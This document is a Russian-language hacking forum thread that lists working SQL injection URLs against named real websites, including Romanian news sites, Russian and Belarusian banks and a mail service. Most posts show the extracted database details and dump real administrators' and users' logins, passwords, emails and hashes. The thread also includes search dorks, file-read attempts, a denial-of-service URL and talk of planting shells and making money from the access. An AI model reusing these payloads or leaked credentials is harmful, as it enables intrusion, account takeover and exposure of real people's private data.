webmaster:e0afac77ae41af23c696457742954ac5
Password ;) :web55ter

Румыния

old.jurnalul.rohttp://old.jurnalul.ro/articol.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19/*5.0.24a-log:jurnalul:jurnalul@avjnet-web

45 таблиц:http://old.jurnalul.ro/articol.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+information_schema.tabl es+limit+44,1/*Наша таблица - admin:id,username,parola,pages,data,statususername : parolazass:floaredelotus
cristi:dinamo
lucian:lucian

Румыния

fundatia-sundari.rohttp://www.fundatia-sundari.ro/marturii.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5/*5.0.45-community-log:fundatia_sundaridefault:fundatia_Robert@localh ost

43 таблицы:http://www.fundatia-sundari.ro/marturii.php?id=-1+union+select+1,2,table_name,4,5+from+information _schema.tables+limit+42,1/*Есть таба Users:UserID,Nume,Parola,Email,Level,
FirstName,LastName,Newsletter,Activated,
LastLogin,LastIP,ConfirmationCode,SundariEMail,
SundariEMailActivated,LastTime,MSN,Y,AIM,
ICQ,Oras,DataNasterii,SiteWeb,Ocupatia,
Interese,Personal,Imagine- hacked -

http://www.videodive.ru/imgnews/news.php?id=-163+union+select+1,concat_ws(0x2F,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12/*


4.0.26-log/u9053@10.10.223.211/u9053

http://ron.the-underdogs.info/game.php?id=-135+union+select+1,concat_ws(0x2F,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,concat_ws(0x2F,user,password),23,24,2 5,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*

Данные: 4.0.27/ron@localhost/ron
Юзеры правда хеш 8(

root/4bca6e21230d24de
flashback/4e62830249e37403
ron/1b4fdeb00b833ac5
macgarden/4a5fe7e15ca085b0
Underdogs/4bca6e21230d24de
doggie/69288c4855bbb52a
forum/3bd00f75423ddffd
hotu/3213f1351227ad25
community/4dfedf012cc6837d
zzt/0e5829ac32cde319
john_doe/70520cc9573c1cd3
phpAds/58efd1e0451c7a6c

http://www.krepsinis.net/news.php?news_id=-66514+union+select+1,concat_ws(0x2F,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,concat_ws(ch ar(58,58),FIRST_NAME,password),14,15,16,17,18,19,2 0+from+users+limit+2,2/*

Данные: 5.0.22-log/sportotiltas1@192.168.69.21/krepsinis

Админы и юзеры

Saulius::66666
Vaidas::vynas
Mindaugas::Eimantukas
Tomas::121212
Dainius::alytus
Tadas::tokogero666
Arvydas::vaisas
Matas::mamamia
Romanas::sharp
Valdas::zatoic
Valentinas::33977

http://www.flushy.com/games.php?id=-324+union+select+1,concat_ws(0x2F,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13/*

4.0.27-max-log/flushy@64.202.163.220/flushy

Румыния

traditii.rohttp://www.traditii.ro/articol.php?nr_articol=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8/*4.1.22-standard-log:traditii_traditii:traditii_cata@localhost

parerea.comhttp://parerea.com/articol.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12/*4.1.22-standard : parereac_wrdp1 : parereac@localhost

agir.rohttp://www.agir.ro/articol.php?id_articol=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10/*5.0.45-community-log:agirro_ziar:agirro_agir@localhost

76 таблиц:http://www.agir.ro/articol.php?id_articol=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+ information_schema.tables+limit+75,1/*Наша таба - agir_users:id,username,password,email,title,realna me,url,icq,msn,aim,yahoo,
location,use_avatar,signature,disp_topics,disp_pos ts,email_setting,
save_pass,notify_with_post,smilies,show_img,show_a vatars,show_sig,
link_to_new_win,timezone,style,num_posts,status,la st_post,registered,
last_visit,last_action,admin_note,activate_string� �ывод данных:http://www.agir.ro/articol.php?id_articol=-1+union+select+1,concat_ws(0x3a,username,password, email),3,4,5,6,7,8,9,10+from+agirro_forum.agir_use rs+limit+109,1/*

Румыния - не обижайся!

visione.rohttp://www.visione.ro/articol.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7,8,9,10,11/*5.1.20-beta-log:visione:visione@localhost

87 таблиц:http://www.visione.ro/articol.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+fr om+information_schema.tables+limit+86,1/*Наши табы forum_users и users

Данные из users (юзер:пасс:мыло:статус):andrei:a ndrei17:andrei@his.ro:Admin
tibi:t0nal357:tibi@visione.ro:Admin
mihaela:euristic:mihaelaraducea@yahoo.com:Moderato r
loredana:huodinamo:lungu_lore@yahoo.com:Moderator
Cosmina:liublliuliubllia:cosmina@visione.ro:Admin
afs:timisoara:afsava@socio.uvt.ro:Moderator
adi:adi:office@subgraphic.ro:Admin
nusa:nusa:nusa.bugeac@gmail.com:Supervizor
andrei.bold:andrei:andrei.bold@sistempsi.ro:Superv izor
ada:ada:gravekiss@yahoo.co.uk:Supervizor
cristina:cristina:cristina2find@yahoo.com.au:Super vizor
camelia:camelia:camitza84@yahoo.com:SupervizorАд минка по адресу _http://www.visione.ro/admin/,
данные для админки смотри выше :D

SQL-инъекция в HotScripts Clone Script

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием software-description.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.


http://site/software-description.php?id=[SQL-inj]

Дорк: inurl:"software-description.php?"
Пример: www.filelook.com
Смотрим версию мускула, текущего юзера, имя базы:

_http://www.filelook.com/software-description.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase())/5.0.45-community:filelook_fileloo@localhost:filelook_file look
Повезло версия мускула=>5, имена таблиц подбирать не нужно, есть таблица information_schema: смотрим названия таблиц, меняя лимит:

_http://www.filelook.com/software-description.php?id=-1+union+select+table_name+from+information_schema. tables+limit+1,1/*
Таблицы:
CHARACTER_SETS (0)
COLLATIONS (1)
COLLATION_CHARACTER_SET_APPLICABILITY (2)
COLUMNS (3)
COLUMN_PRIVILEGES (4)
KEY_COLUMN_USAGE (5)
PROFILING (6)
ROUTINES (7)
SCHEMATA (8)
SCHEMA_PRIVILEGES (9)
STATISTICS (10)
TABLES (11)
TABLE_CONSTRAINTS (12)
TABLE_PRIVILEGES (13)
TRIGGERS (14)
USER_PRIVILEGES (15) -
VIEWS (16)
csv_feed (17)
data (18)
filelook_author_submission (19)
filelook_awards (20)
filelook_errreport (21)
phpcountersmart_besucher (22)
phpcountersmart_browser (23)
phpcountersmart_color (24)
phpcountersmart_ip (25)
phpcountersmart_os (26)
phpcountersmart_provider (27)
phpcountersmart_referer (28)
phpcountersmart_screen (29)
sbwmd_admin (30) - интересная таблица ;-) поля: id, admin_name, pwd
sbwmd_ads (31)
sbwmd_banners (32)
sbwmd_categories(33)
sbwmd_config(34) - интересная таблица ;-)
Всего 35 таблиц.
Смотрим логин и пасс админа, id:

_http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char (58),id)+from+sbwmd_admin/*
admin:minur786:1
Находим админку:

_http://www.filelook.com/siteadmin
К сожалению... облом! (логин и пасс не подходят к админке или запрещены удалённые подключения ?).

Как посмотреть остальных админов?
Почему запросы с limit и where не прокатывают?
_http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char (58),id)+from+sbwmd_admin+limit+1,1/*
_http://www.filelook.com/software-description.php?id=-1+select+admin_name+from+sbwmd_admin+where+id=2/*

Ещё один пример: brigaderu.ru

http://brigaderu.ru/software-description.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase())/*
4.1.22:brigader@fe20.hc.ru:wwwbrigaderuru
Админ:

_http://brigaderu.ru/software-description.php?id=-1+UNION+SELECT+concat(admin_name,char(58),pwd,char (58),id)+FROM+sbwmd_admin/*siteadm:brg48Zm:1
Дальше всё аналогично предыдущему примеру: к в админку не пускает, файлы читать,имхо, нет привилегий, limit,where не катят. В чём косяк?

SQL-инъекция в HotScripts Clone Script
Как посмотреть остальных админов?
Почему запросы с limit и where не прокатывают?
_http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char (58),id)+from+sbwmd_admin+limit+1,1/*
_http://www.filelook.com/software-description.php?id=-1+select+admin_name+from+sbwmd_admin+where+id=2/*
Дальше всё аналогично предыдущему примеру: к в админку не пускает, файлы читать,имхо, нет привилегий, limit,where не катят. В чём косяк?

я думаю нет там косяка, просто нету больше админов
1. _http://www.filelook.com/software-description.php?id=-1+union+select+count(admin_name)+from+sbwmd_admin/*
count возвращает кол 1

limit and order тоже работают
http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char (58),id)+from+sbwmd_admin+limit+0,1/*
, такая же история и с "+where+id=1/*"

http://www.1adruck.de/catalog/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.patronen-markt.de/catalog/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.hiddenstreamfarm.com/catalog-hsf/links.php?link_id=-999+union+select+1,2,user(),4,5,6,7,8,9/*
http://www.fitnesstienda.com/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9/*
http://www.ocioportal.net/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.bibeloty.com.pl/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*

http://www.webmasters.org/ Здесь всё работает.................................. ..
http://www.webmasters.org/scripts/software-description.php?id=-1+union+select+1,2,concat(admin_name,char(58),pwd, char(58),id),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27+from+sbwmd_admin/*
Админка:
http://www.webmasters.org/scripts/siteadmin/
admin:webmasters666:1

__Т__
НоВ



http://www.ntv.ru/corp/press/index.jsp?what=News&id=119720/**/and/**/(select/**/1/**/from/**/sys.dual)=1--

фильтруются пробелы, "$" и возможно другие символы
на самом деле инъекций там много, просто привел пример одной из них

может можно провести (почти уверен) инъекцию с помощью union select , но 56 раз null писать мне незахотелось

Румыния. Продолжаем...

zf.rohttp://www.zf.ro/articol.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22/*5.0.21-log:zf:zf@127.0.0.1

Открытых таб не много, из них:adminuserright
adminuserdomains
adminuser
adminroleview
adminrole
active_users
adminviewПоля в adminuser:adminuser_uname
adminuser_name
adminuser_password
adminuser_level
adminuser_roleНекоторые данные из неё (uname : name : password):mirela:mirela:marinela
vlad:Vlad Nicolaescu:samsung
Radu24:Radu ZF 24:zf24
elisa.mitroiu:Elisa Mitroiu:elemit
anca.teodorescu:Anca Teodorescu
и др.Админка здесь _http://www.zf.ro/admin/, но зайти не получилось :confused:

magazinulprogresiv.rohttp://www.magazinulprogresiv.ro/stiri.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9/*5.0.27-standard:trtro_mp:trtro_adminmp@localhost

30 таблиц - и ни одной интересной...
Разве что таба guestbook с сочитанием полей g_name и g_email

impreuna.arts.rohttp://www.impreuna.arts.ro/articol.php?limba=1&id_articol=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user())/*4.1.22-standard-log:impreuna_impreuna:impreuna_root@localhost

efoto.rohttp://www.efoto.ro/articol.php?a=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7,8,9,10/*4.1.22-standard-log:efoto_db:efoto_efoto@localhost

badorgood.comhttp://www.badorgood.com/detailn.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/*4.1.22-standard-log:bog_BOG:bog_bog@localhost

parerea.comhttp://parerea.com/articol.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12/*4.1.22-standard : parereac_wrdp1 : parereac@localhost

СПОРТ\\\
телеканал



http://news.sportbox.ru/Vidy_sporta/billiard/results?browseCueist=340/**/union/*'*/select/**/1,TABLE_NAME,null,null,null,null,null,1,1,null,1,n ull,null%20from/**/INFORMATION_SCHEMA.TABLES--

Инъекция в POSTGRE
открываем ссылку, смотрим исходный код страницы, видим имена всех таблиц

Румыния

colectzii.rohttp://www.colectzii.ro/wiki.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5/*5.0.45-community-log:colectzi_main:colectzi_Robert@localhost

78 таблиц:http://www.colectzii.ro/wiki.php?id=-1+union+select+1,table_name,3,4,5+from+information _schema.tables+limit+77,1/*Заинтересовали табы:Emailz
Users
UsersIPs
UsersHideLicsВ табе Users 50(!) полей:ID,UserName,Psw,Email,Tel,DataNasterii, Oras,Adr1,Adr2,IP,LastLogin,Activated,Vanzari,Cump arari,DataCrearii,Nume,Prenume,Newsletter,Confirma tionCode,MSN,Y,ICQ,Profesie,Interese,Personal,Imag ine,Level,Viewed,PunctePlus,PuncteMinus,Tokens,ReL ic,ReLicSendMail,Recs,RecsLeft,LastVisit,PrevLogin ,LastBirthdayMail,BlockMinNegativeEvals,IsOK,Web,W ishWeb,NewMail,NewMailCode,WishOK,ChPswCode,Banned ,ShowOnlyOK,AllowOnlyOK,PayPalАдминка здесь _http://www.colectzii.ro/login.php

Админы (логин:пасс):Robert : bobi
Albert : stiutotul

Сайт

http://www.certification.ru (http://www.certification.ru)

Он же

http://www.mcp.ru (http://www.mcp.ru) , http://www.ccna.ru (http://www.ccna.ru) , http://www.ccnp.ru (http://www.ccnp.ru) , http://www.cna.ru (http://www.cna.ru) , http://www.cne.ru (http://www.cne.ru) и http://www.mcsd.ru (http://www.mcsd.ru).


http://www.certification.ru/cgi-bin/userinfo.cgi?x_offset=20'&x_limit=20&fio=&email=&nick=&certs=&city=
ERROR: DBD::mysql::st execute failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20' at line 1 at
/www/ru.certification/w2api/modules/queries.pm line 44.
select * from users order by crating desc, fio limit 20', 20: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20' at line 1 at
/www/ru.certification/w2api/modules/queries.pm line 44.
String found where operator expected at (eval 15) line 1, at end of line (Missing operator before ?)
/www/ru.certification/cgi-bin/userinfo.cgi: parser, calculate line 328 [from = @@global.Offset@@ + 1]: Can't find string terminator "'" anywhere before EOF at (eval 15) line 1.
String found where operator expected at (eval 16) line 1, at end of line (Missing operator before ?)
/www/ru.certification/cgi-bin/userinfo.cgi: parser, calculate line 329 [till = @@global.Offset@@ + @@global.Limit@@]:
Can't find string terminator "'" anywhere before EOF at (eval 16) line 1.
Can't use an undefined value as a HASH reference at /www/ru.certification/cgi-bin/userinfo.cgi line 111.

FATAL ERROR:

http://www.mcp.ru/labmarket/searchresult.html?type=resu'me&scheme=sea_lab&sal1=&sal2=&ospeciality=&city=&ocity=&spec=
—UT.Ђ)S..?UTadmintemplatesя™UTconfigА UT extentionsЯЎUTlabmarkettemplatesяўUT
mailtemplatesЂяЈUTmodulesЁUTordertemplatesя© UTpartnertemplatesЂячЂT templatesСЯшЂT
usertemplatesЂяцVTsuppliers.conf6нVT owner.confхVTШ shop.confцVTД.suppliers.conf.IX99lN

http://www.mcp.ru/labmarket/fullvacancy.html?id=10662+AND+VERSION()+like+'%' и т.д. подбором...

Версия "мускула": 4.1.14
Имя БД: certification
Имя пользователя БД: cert_localhost

В БД есть таблицы users и moderators.
Таблица users содержит поля: id, fio, login, city, nick, sex, url, icq, showemail, sendemail, birth, pos, workplace, certs.
Таблица moderators содержит поля: email, id, city, url.

Модераторские аккаунты:

adminx@yandex.ru:assa
xcosmic@gmail.com:JdsBPsQ

Просто "блатные" аккаунты:

lenka@education.ru:lenka
club@certification.ru:DPSrq]pH?7N({XRm>*7C
admin@xpoint.ru:q

http://www.mcp.ru/cgi-bin/forum.cgi?action=thread&id=26348+OR+1 - DOS-атака, сервак ложится надолго :-)

http://www.mcp.ru/admin/ - Админка

Румыния

4x4.rohttp://www.4x4.ro/index-articol.php?sc=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())/*5.0.37:fourx4:dvautomedia@localhost

81 таблица:http://www.4x4.ro/index-articol.php?sc=-1+union+select+1,2,table_name++from+information_sc hema.tables+limit+80,1/*

Наши таблицы:pre_forum_user
gal2_User
useriПоля таблицы useri:email,login,parola,adminАдмин (логин:пасс):body00:parola

http://www.sportfinder.ru/show_sites.php?query_type=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3/*

4.0.27-log/wushu/wushu@pm19.zenon.net

-------------------------------------------------------------------

sportal.by

http://sportal.by/menu.php?form_id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user())/*

5.0.22-Debian_2-log/sportalby/sportalby@localhost


http://sportal.by/menu.php?form_id=-1+union+select+1,2,concat_ws(0x2F,username,user_pa ssword,user_icq)+from+phpbb_users+limit+1,1/*

логин/хеш/уин
admin/828a4b79b3ad488d3181abe23c44e7d2/

http://www.spylog.ru/

http://dir.spylog.ru/index1.phtml?group=5480%20and%201=5%20union%20sele ct%201%20from%20mysql.user/*

все, что нашел..

таблица
rating.sites
поля
id, name, url, descr


если кто чего еще найдет, отпишитесь, есть некоторые соображения..в плане выжимки бабла с этого сраного спайлога.

http://mosdor.ru/?item&id=-3/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,concat(version(),0x3a,database(),0x3a,user()), 23,24,25,26,27,28,29,30,31/*
db_andred_4:dbu_andred_4@192.168.3.72

http://www.turistor.ro/art/articol.php?id=-7+union+select+1,2,3,4,concat_ws(char(58,58),user( ),database(),version()),6,7,8,9,10/*
ovidiuc@localhost::turistor::5.0.32-Debian_7etch1-log
Нашёл таблицу membri, дальше не раскручивал.

http://www.citroen-club.kiev.ua/news.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user())/*

4.1.22/cit

-----------------------------------------------------------------------------

http://ngo.pskov.ru/tur_club/index.php?action=show_topic&catid=8&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*

5.0.44-log/news/infonet@localhost



http://ngo.pskov.ru/tur_club/index.php?action=show_topic&catid=8&id=-1+union+select+1,concat_ws(0x2F,uname,passwd),3,4, 5,6,7,8,9+from+admin+limit+0,1/*

логин/пароль
master/newsbase + еще 6 юзеров

Сайт о кино... http://ww.rmdb.ru/?movie&id=-1+union+select+version(),user()/*
БД 4 =\

Румыния

semneparticulare.rohttp://www.semneparticulare.ro/index.php?catid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7,8,9/*&catname=Editorial4.1.22-standard-log:semnepar_ziar:semnepar_semnepa@localhost

linkmagazine.rohttp://www.linkmagazine.ro/articol.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10/*4.1.22-standard-log:linkmag_linkmag:linkmag_linkmag@localhost

garsonieraluimaruta.rohttp://www.garsonieraluimaruta.ro/invitatilist.php?cat=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7/*4.1.22-standard:garson_main:garson_main@localhost

saloane.rohttp://www.saloane.ro/articol.php?doc=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10/*5.0.24a-standard-log:saloane:saloane@goober.dreamhost.com

24 открытых таблицы:http://www.saloane.ro/articol.php?doc=-1+union+select+1,2,table_name,4,5,6,7,8,9,10+from+ information_schema.tables+limit+23,1/*... и ни одной интересной :mad:

сайт админят скорее всего по фтп: ftp.saloane.ro

http://maxitour.ru/hotels?id=-311%20union%20select%201,2,3,4,5,6,7,8,9,10,11,pas sw,13,14,15,16,17,18,19,20,21,22%20from%20users%20/*

все понятно без слов.. пароль расшифруется в три минуты.. а равен он логину..а логин макситурс вроде

http://www.newkenigsberg.ru/index.php?change=-21%20union%20select%201,2,3,concat(login,char(47), password,char(47),admin,char(47),Admtm,char(47),ph oto,char(47),Email,char(47),info,char(47),phone,ch ar(47),address,char(47),anons),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,33,32,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48%20from%20auth_user/*

мускул пятый..все на экране...сайт издательского дома еврорубль..в калининграде

газэнергопромбанк..
не знаю кто как..
http://www.geprobank.ru/press/banknews/?article=-1959%20union%20select%201,2,3,4,5,6,table_name,8,t able_schema,10,11,12%20from%20information_schema.t ables%20limit%2015,1/*

пятый мускул..таблицы наружу..чет смыкал смыкмал..ничего интересного ен насмыкал..пишите.


http://mkb.ru/about_bank/work/vacancy.php?id=31%20AND%201=3%20union%20select%201 ,2,AES_DECRYPT(AES_ENCRYPT(column_name,0x71),0x71) ,4,5,6,7,8,9,10,11,12%20from%20information_schema. columns%20where%20table_name='users'%20AND%20table _schema='struct'%20limit%201,1/*

московский кредитный банк.. да защита у банков нынче никакая..еще с менатепа все начинал.. есть две или три таблицы юзерз ..правда инфа в них разнаю.. бд с инфой о юзерах онлайн банкинга находится на другом серваке..пролезть не удалось, если кто откроет новые просторы для боевых действий, просьба отписаться..

вот тут прикольно ..уралвеб..почта!
http://www.uralweb.ru/tourism/index.php?region_sel=all&tour_sel=-4%20UNION%20select%201,2,table_name,4,5,6,7,8,9%20 from%20information_schema.tables%20/*&place=47

есть бд mail..там чет типа аккаунтс или мемберс..ну найти легко, опять же пятый мускул ..смотрим имена таблиц и полей.. находим почтовик с открытыми паролями..юзаем кто кому как надо.. залить шел так и не получилось..

http://www.shsb.ru/seminar.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10/*

4.1.20/nshp/nshp@localhost

-----------------------------------------------------------------
rus.srbc.ru

http://rus.srbc.ru/home.asp?artId=-1+or+1=@@version--
Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86) Mar 3 2007 18:40:02 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+user)--
all_from_web

http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+db_name())--
BusinessClub

http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+top+1+table_name+from+information_s chema.tables)--

В таблицах не копался

http://www.pollit.ru/?post=-1'

www.theblocparty.org

_http://www.theblocparty.org/friends/index.php?mode=events&act=viewevent&seid=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
www.onlyfabrics.com

_http://www.onlyfabrics.com/friends/index.php?mode=events&act=viewevent&seid=-1+union+select+1,2,3,user(),version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- ЗЫ подробно о скуле в AlstraSoft E-Friends читаем тут: https://forum.antichat.ru/thread54157.html

http://www.cgc onn.com/content/article.php?id=-77'+union+select+1,2,user,password,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21+from+mysql.user/*

Интересный логин-pma,логинимся в http://www.cgc onn.com/phpmyadmin под логином pma без пасса)

http://www.cgc onn.com/content/article.php?id=-77'+union+select+1,2,table_name,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21+from+information_sch ema.tables/*

Таблицы хранятся в другой бд,юзаем переход через точку
Определяем БД

http://www.cgcon n.com/content/article.php?id=-77'+union+select+1,2,table_schema,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21+from+information_s chema.tables+where+table_name='users'/*


http://www.cg conn.com/content/article.php?id=-77'+union+select+1,2,concat(username,0x3a,password ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+parts.users+limit+1,10/*


http://www.cgco nn.com/content/article.php?id=-77'+union+select+1,2,concat(name,0x3a,pass),4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+web auth.user_pwd/*

и т.д и т.п

хренпроссышь что за контора - админка /admin/
http://abvgroup.ru/part.php?id=-1%20union%20select%20login,password%20from%20users %20/*

вот думал бабла надыбать помелочи..нашел скулу..
http://sportingbet.enetpulse.com/?g=ts&stats=true&sid=2007&lid=-5%20union%20select%201,2,LOAD_FILE(char(47,104,111 ,109,101,47,109,105,110,105,115,105,116,101,115,47 ,115,112,111,114,116,105,110,103,98,101,116,46,101 ,110,101,116,112,117,108,115,101,46,99,111,109,47, 116,115,95,115,116,97,116,115,46,112,104,112)),4,5 ,6,7,8,9,10,11%20from%20mysql.user/*мож кто допетрит..

клубинка какая-то ..впадлу пасы декодить ...
http://www.clubinka.ru/release.php?rdl=6%20AND%201=19%20union%20select%20 1,2,3,AES_DECRYPT(AES_ENCRYPT(login,0x71),0x71),AE S_DECRYPT(AES_ENCRYPT(pass,0x71),0x71),6,7,8,9%20f rom%20admin%20/*

http://www.toptur.ru/?pp=&cat=-73'%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(v ersion(),0x71),0x71),3,4/*

софт какой-то ...да пох какой софт.. таблиц не нашел
http://nextaz.com/showsoft.php?id=-8247%20union%20select%201,version(),3,4,5,6,7,8,9, 10,11,12%20/*

http://newkurkino.ru

http://newkurkino.ru/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,concat_ws(0x2F,version(),database %20(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21/*

4.0.26-log/udb223/Uwww223S@localhost

вот сайтец..нормально его тоже можно ковырнуть.. вообще есть контора одна на украине..издательство..так у них там много подвязано сайтов в сети.. журнал какой-то выпускают..домашникй кампутер..если кому интересно, стучите в асю..там есть лазейка..и шел залить можна...
http://www.hotline.ua/pr/193-11-248/?v=438%20AND%201=3%20union%20select%201,2,3,host,5 ,6,7,8,9,10,11,12,13,12,15,16,17,LOAD_FILE('/server/htdocs/'),19,20,21,22,23,24,25,26,27,28,29,30,31%20from%2 0mysql.user/*&t=0&o=0&d=0&p=0

Снова UA
Сайт какой-то турфирмы..НО! хостится он на серваке каким-то образом связанным с правительством.. (по словам одного из админов одного сайта, точно также хостящегося на етом серваке..может и песдит..мне пох)
http://turi100.net/reviews/?review_id=225%20and%201=3)%20union%20select%201,2 ,3,version(),5,6/*версия мускула позволяет мне опустить рассказы о существующих таблицах..читаем отзывы туристов..в каментах..

Вот это сайт..у меня вообще слабость к базам данных..особенно телефонным..но тут, к сожелению, ничего не срослось, народ, прошу помощи у тебя, будет доступ к базе - отпишитесь
http://www.btk-online.ru/rest/?&r=2749%20union%20select%20concat(user,char(124),pa ssword,char(124),host)%20from%20mysql.user%20/*

Ждите продолжения :p

Белвнешэкономбанк
http://bveb.by/currency/pmetals.php?Metal=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x71),0x71),3,4,5,6/*&DateStamp=2007-11-20%2000:00:00
А вот для входа юзеров там савсем другой сайтик.... интересно и там порыться но это уже другая история :)

Сайт сервера la2 - стоит java эмуль

список табличек
http://www.l2planet.ru/?go=files&type=3%20union%20select%201,2,table_name,4,5,6,7%2 0from%20information_schema.tables/*

список пользователей + пасы
http://www.l2planet.ru/?go=files&type=3%20union%20select%201,2,account,newpass,oldp ass,6,7%20from%20pass_ls_l2pl/*
пасы зашифрованы таким образом
base64_encode(pack("H*",sha1(utf8_encode($password))));
такчто расшифровывать можно долго(или я неправ)

LOAD_FILE - запрещен
кавычки запрещены - меджик квотес (приходится юзать char())
Вобщем нечего более интересного добыть не удалось.

http://www.hpol.org/transcript.php?id=-92+union+select+1,table_name,version(),4,database( )+from+iNFORMATION_SCHEMA.TABLES+limit+0,2/*

version=mysql 5.0.27
user=ro@localhost
database= listen


http://www.tat.pl/sztuka_ld.php?id=-776+union+select+1,table_name+from+INFORMATION_SCH Ema.tables/*
version= 5.0.33

2 Dark[<X>]D1ablo

http://www.hpol.org/transcript.php?id=-92+union+select+1,concat(table_schema,0x3a,table_n ame),3,4,5+from+INFORMATION_SCHEMA.columns+where+c olumn_name=0x70617373776F7264+limit+0,1/*
hpol:administrator

http://www.hpol.org/transcript.php?id=-92+union+select+1,concat_ws(0x3a,name,password),3, 4,5+from+hpol.administrator+limit+0,1/*

Tao Huang:test
Admin:hpol
Jerry Goldman:jumber
stubaker:admin
Tony Becker:shooter

Такой вид скули более интересен =)

http://www.correl.ru/intresting.php?id=-557+union+select+1,2,3,table_name,5,6+from+informa tion_schema.columns+where+column_name=0x7061737377 6f7264/*

8 баз
administrators.
cinema_accounts.
flashchat_rooms.
flashchat_users.
forum_users.
ibf_forums.
ibf_members.
user.

1 база [administrators.]
login: password:

andy pereslavl
mishasun 2038134

2 База [forum_users]

Nick: password: mail:

Самозванец/4321/sam@nifiga.net.
Asa/231274/alseal74@mail.ru.
Киса/2005/123.
Ёлка/4321/nafiesta@mail.ru.
Alpik/0221/homyak-info@mail.ru.
Geniy/123789/werty.
Taret/987321/asdf.
Neon/456321/lkjh.
КОНТРА/7777/hok@kontra.ru.
Рамиль/bubas/slon-ram@mail.ru.
niagara/1234/zxc.
Ирина/13579/isaluk82@mail.ru.
дима/killer/prebludok@mail.ru.
Киса/2005/123.
Ёлка/4321/nafiesta@mail.ru.

3 база [ibf_members]

Name: Password: email: icq:
Guest//test@localhost.com.
